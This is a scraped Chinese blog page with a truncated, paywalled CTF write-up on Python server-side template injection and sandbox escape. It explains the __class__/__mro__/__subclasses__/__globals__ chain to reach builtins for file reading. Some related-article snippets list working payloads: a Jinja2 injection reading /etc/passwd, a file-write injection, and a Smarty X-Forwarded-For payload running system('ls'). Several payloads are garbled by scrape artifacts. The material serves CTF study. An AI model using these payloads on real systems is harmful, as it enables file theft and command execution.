php沙盒绕过ctf,浅析SSTI(python沙盒绕过)

最新推荐文章于 2024-05-02 04:10:46 发布
最新推荐文章于 2024-05-02 04:10:46 发布
阅读量865 收藏 1
点赞数
文章标签: php沙盒绕过ctf

在CTF比赛中见过不少的SSTI题目,在这里整理下思路,记录下

0x01 简介

SSTI(Server-Side Template Injection),即服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的,目前CTF常见的SSTI题中,大部分是考python的

0x02 攻击流程

攻击流程,以文件读取为例子

函数解析

__class__ 返回调用的参数类型

__bases__ 返回类型列表

__mro__ 此属性是在方法解析期间寻找基类时考虑的类元组

__subclasses__() 返回object的子类

__globals__ 函数会以字典类型返回当前位置的全部全局变量 与 func_globals 等价

获取基本类

''.__class__.__mro__[zxsq-anti-bbcode-2]

{}.__class__.__bases__[zxsq-anti-bbcode-0]

().__class__.__bases__[zxsq-anti-bbcode-0]

[zxsq-anti-bbcode-].__class__.__bases__[0]

request.__class__.__mro__[zxsq-anti-bbcode-8] //针对jinjia2/flask为[zxsq-anti-bbcode-9]适用

获取基本类后,继续向下获取基本类(object)的子类

object.__subclasses__()

找到重载过的__init__类(在获取初始化属性后,带wrapper的说明没有重载,寻找不带warpper的)

>>> ''.__class__.__mro__[zxsq-anti-bbcode-2].__subclasses__()[zxsq-anti-bbcode-99].__init__

<slot wrapper '__init__' of 'object' objects>

>>> ''.__class__.__mro__[zxsq-anti-bbcode-2].__subclasses__()[zxsq-anti-bbcode-59].__init__

<unbound method WarningMessage.__init__>

查看其引用__builtins__

builtins即是引用,Python程序一旦启动,它就会在程序员所写的代码没有运行之前就已经被加载到内存中了,而对于builtins却不用导入,它在任何模块都直接可见,所以这里直接调用引用的模块

''.__class__.__mro__[zxsq-anti-bbcode-2].__subclasses__()[zxsq-anti-bbcode-59].__init__.__globals__[zxsq-anti-bbcode-'__builtins__']

这里会返回dict类型,寻找keys中可用函数,直接调用即可,使用keys中的file以实现读取文件的功能

''.__class__.__m

最低0.47元/天 解锁文章
weixin_39583162
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP代码审计之SSTI模板注入
qq_22132931的博客
12-08 670
PHP代码审计之SSTI模板注入
SSTI(模块注入)的简单学习
dbabs的博客
02-05 637
SSTI即服务端模版注入攻击。由于程序员代码编写不当,导致用户输入可以修改服务端模版的执行逻辑,从而造成XSS,任意文件读取,代码执行等一系列问题。
渗透学习-23- WEB 攻防-Python 考点&amp;CTF 与 CMS-SSTI 模版注入&amp;PYC 反编译
最新发布
2301_76268112的博客
05-02 32
举个例子,我想买裙子,这时候我会打开某宝,直接在搜索框输入“裙子”,就会出现跟裙子相关的一系列商品,各种颜色,各种样式。那我们来想一下,这么多商品的各种信息是直接全部写死在页面上的嘛?那我们每次查找的商品都不一样,需要的内存就太大了很显然,并不是,所以这里就体现了我们模板引擎的作用,它可以根据从数据库中实时提取出来的数据对html页面实时的渲染,这,就是模板引擎。漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,
服务器端模板注入(SSTI)详解
键盘的起始页
01-11 1599
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。 模板引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过
SSTI-payload和各种绕过方法
qq_44418229的博客
07-25 1703
SSTI总结:流程和绕过
最全SSTI模板注入waf绕过总结(6700+字数!)
2301_76690905的博客
11-09 1208
详细介绍了各种方法绕过混合过滤,关键字过滤,各种符号过滤,点过滤,下划线过滤,单双引号过滤,很齐全
使用OpCode绕过Python沙箱的方法详解
09-18
绕过Python沙箱需要对Python的字节码有深入的理解,同时也需要考虑沙箱的具体实现。在实际应用中,沙箱可能会对字节码操作进行额外的限制,因此实际绕过可能需要更复杂的技巧和策略。总的来说,掌握OpCode知识是提高...
沙盒Python
02-11
"沙盒Python"是一个专为Python编程环境设计的安全运行空间,它允许用户在限制的环境中执行代码,以防止潜在的恶意行为或意外破坏系统。在Python中,沙盒的概念主要体现在安全性和隔离性上,确保代码只能访问预先授权...
CSandBox:一个基于 PythonPython 沙盒程序
05-13
CSandBox这是一个基于 PythonPython 沙盒程序.只支持单文件进行运行.以支持的功能:基础数据结构字符串intfloatbool列表字典元组切片函数位置参数闭包递归控制语句ifforwhile运算基础四则运算位运算逻辑运算几乎...
python-sandbox:适用于小型Python项目的沙盒
02-23
在IT领域,尤其是在编程和软件开发中,"沙盒"是一种环境,允许开发者在其中运行代码而不影响系统其他部分。"Python-sandbox"是专为小型Python项目设计的一个沙箱环境,它提供了一种安全的方式来执行不受信任或可能有...
v5多开器,沙盒,游戏多开
10-24
【标题】"v5多开器,沙盒,游戏多开"所指的是一款名为v5的多开工具,主要用于实现应用程序,特别是游戏的多个实例同时运行。在IT领域,多开器是一种软件,它允许用户在同一设备上开启同一程序的多个副本,这样就可以在...
Flask jinja2模板注入思路总结
weixin_53146913的博客
05-12 1116
一、总结一下常用的payload: python2: 读写文件: #读文件: {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} #写文件: {{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/1').write("") }} 也可以通过写jinja2的environment.py执行命令; jinja2的模板会load这个module,而且这个en
CTF命令执行绕过总结
gou1791241251的博客
08-04 755
命令执行绕过命令总结
SSTI漏洞利用及绕过总结(绕过姿势多样)
永不落的梦想
07-15 1718
SSTI模板注入,详细的常用注入模块利用,全面的SSTI绕过总结
Python Flask SSTI 之 长度限制绕过
weixin_43995419的博客
09-12 952
Python flask SSTI 之 长度限制绕过
SSTI+python沙箱逃逸
Scorpio_m7
10-02 2376
SSTI(Server-Side Template Injection) 服务器接受了用户的输入,过滤不严谨,将用户输入作为web应用模板的一部分,但是在通过模板引擎进行渲染的过程中,执行了用户输入的恶意代码,造成命令执行 沙箱逃逸 在代码执行的环境下,脱离过滤和限制,最终拿到shell权限的过程。 模板引擎 为了使用户界面与业务数据分离而产生,可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档 flask-jinja2 flask使用jinja2作为框架的模板系统。jinja2是基于
python中class_Python安全之SSTI——Flask/Jinja2
weixin_39744240的博客
11-23 506
一、关于SSTISSTI(Server Side Template Injection),又称服务端模板注入攻击。其发生在MVC框架中的view层,常见的用于渲染的模板有Twig、FreeMarker、Velocity、Smarty等。服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而可能导致了敏感信息泄露、代码执行...
[ctf web]SSTI PHP的模板注入SSTI (smarty+Twig) 以及[BJDCTF2020]Cookie is so stable
ShenZ的博客
08-30 3288
PHP的模板注入 如果是在cookie处执行,最好抓包打payload,可能有url编码的问题 smarty模板注入 控制XFF进行命令执行(这是要在前端有IP相关回显的情况) payload: X-Forwarded-For: {{system("ls")}} 利用 {$smarty.version} //smarty的版本号 标签 {php} 可以使用{php}{/php}标签来执行被包裹其中的php指令 {php}phpinfo();{/php} Smarty已经废弃{php}标签,
[CTF的PASSBY]浅谈FLASK-jinja2 SSTI绕过
qq_64201116的博客
07-04 2224
我目前了解的后端的三大语言,基于php,基于java,基于python,这篇文章就来浅浅谈谈关于python构造的flask过滤SSTI不严谨导致的SSTI注入
php 沙箱逃逸,浅析Python SSTI/沙盒逃逸
06-01
其次,Python SSTI(Server-Side Template Injection)是指攻击者通过某些手段,成功绕过Python模板引擎的安全限制,执行恶意代码,达到控制服务器的目的。常见的攻击手段包括但不限于:模板注入、变量覆盖、函数...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值